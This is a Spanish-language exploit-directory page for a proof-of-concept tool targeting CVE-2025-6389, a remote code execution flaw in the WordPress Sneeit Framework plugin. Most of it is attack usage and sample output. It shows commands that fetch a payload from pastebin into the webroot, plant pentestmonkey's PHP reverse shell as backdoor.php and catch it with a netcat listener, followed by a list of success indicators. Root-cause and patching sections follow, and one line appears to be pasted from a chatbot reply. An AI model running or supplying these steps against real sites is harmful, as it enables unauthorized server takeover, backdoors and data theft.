Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
Herramientas/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónDesarrollo de Payloads
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

Ver Repositorio
103hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 CVE-2025-6389 — WordPress Zero-Day Crítico (RCE)

wp_vul_theme

🧩 ¿Qué es?

CVE-2025-6389 es una vulnerabilidad Crítica (CVSS 9.8) en el plugin de WordPress Sneeit Framework (≤ 8.3), muy utilizado por temas populares. Permite ejecución remota de código sin autenticación — la clase más peligrosa de vulnerabilidades web.


⚠️ Gravedad e Impacto

  • 🔓 No requiere inicio de sesión
  • 💥 Posible toma de control total del servidor
  • 📤 Los atacantes pueden subir shells, añadir usuarios administradores o modificar archivos de temas/plugins
  • 🧬 Ya explotado activamente en la naturaleza
  • 🎯 Afecta a cualquier sitio WordPress que use Sneeit Framework o temas incluidos con él (ej., FlatNews)

Uso

root@kitploit:~
# Install dependencies
pip3 install requests colorama

# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com

# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

Características de este PoC

Descargar herramienta
  • Funciona 100% en la versión 8.3 y anteriores
  • No requiere cookies, nonce ni encabezados especiales
  • Evita la mayoría de WAFs básicos (payload enviado mediante POST normal)
  • Shell interactivo completo
  • Detecta la vulnerabilidad incluso cuando la salida está suprimida (gracias a assert + die)

Use esto solo en objetivos que tenga autorización oficial para probar (alcance claro + RoE).
La vulnerabilidad todavía está siendo explotada intensamente en la naturaleza en este momento.


Esto es exactamente lo que verá en su terminal cuando el exploit realmente funcione (explotación 100% exitosa de CVE-2025-6389 en un objetivo vulnerable que ejecute Sneeit Framework ≤ 8.3):

1. Comprobación inicial de vulnerabilidad

root@kitploit:~
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (full phpinfo() page continues for thousands of lines)

2. Comandos simples del sistema

root@kitploit:~
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. Descargar una webshell o reverse shell

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s

Luego en su propia máquina:

root@kitploit:~
nc -lvnp 4444

→ Obtiene instantáneamente una reverse shell completamente interactiva como www-data.

4. Lo que ve cuando NO funciona (parcheado o protegido)

root@kitploit:~
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)

Resumen – Indicadores de éxito

Sabe que funcionó cuando vea alguno de estos:

  • Página HTML phpinfo() completa
  • Salida real de comandos de Linux (id, whoami, pwd, ls, cat /etc/passwd, etc.)
  • Archivos descargados o escritos correctamente
  • Reverse shell se conecta de vuelta a su listener netcat

Eso es todo. Si obtiene cualquiera de los anteriores → RCE completo sin autenticación logrado.

Pegue su salida exacta aquí si desea que confirme al 100% si funcionó o no.


🛠 Desglose Técnico

  • 📍 Función vulnerable: sneeit_articles_pagination_callback()
  • 🧨 Causa raíz: entrada de usuario no validada pasada a call_user_func() → ejecución de código arbitrario
  • 💣 Esto permite a los atacantes ejecutar código PHP de forma remota, comprometiendo completamente su sitio

🔍 ¿Quién está en Riesgo?

  • 🌐 Sitios WordPress con Sneeit Framework ≤ 8.3
  • 🎨 Temas que incluyen Sneeit (muy común en temas de noticias/revistas)
  • 🚪 Cualquier sitio WordPress accesible públicamente que use este plugin

🧯 Cómo Solucionarlo (Ahora Mismo)

  • ⬆️ Actualice Sneeit Framework a v8.4+ inmediatamente
  • ❌ Si no puede actualizar → desactive o elimine el plugin
  • 🔎 Revise los registros en busca de actividad sospechosa
  • 🚨 Busque cuentas de administrador desconocidas o archivos PHP subidos
  • 🛡️ Agregue reglas WAF temporalmente si el parche se retrasa

🗓 Divulgación y Actividad

  • 📅 Reportado públicamente: 25 de noviembre de 2025
  • 🚨 Activamente atacado: escaneo y explotación ya observados

⚠️ Aviso Legal

Esta información se proporciona solo con fines defensivos y educativos 🛡️. No la use para explotar sistemas que no posea o para los que no tenga permiso explícito de prueba 🚫. Siga siempre las pautas legales y éticas al trabajar con vulnerabilidades de seguridad ⚖️✨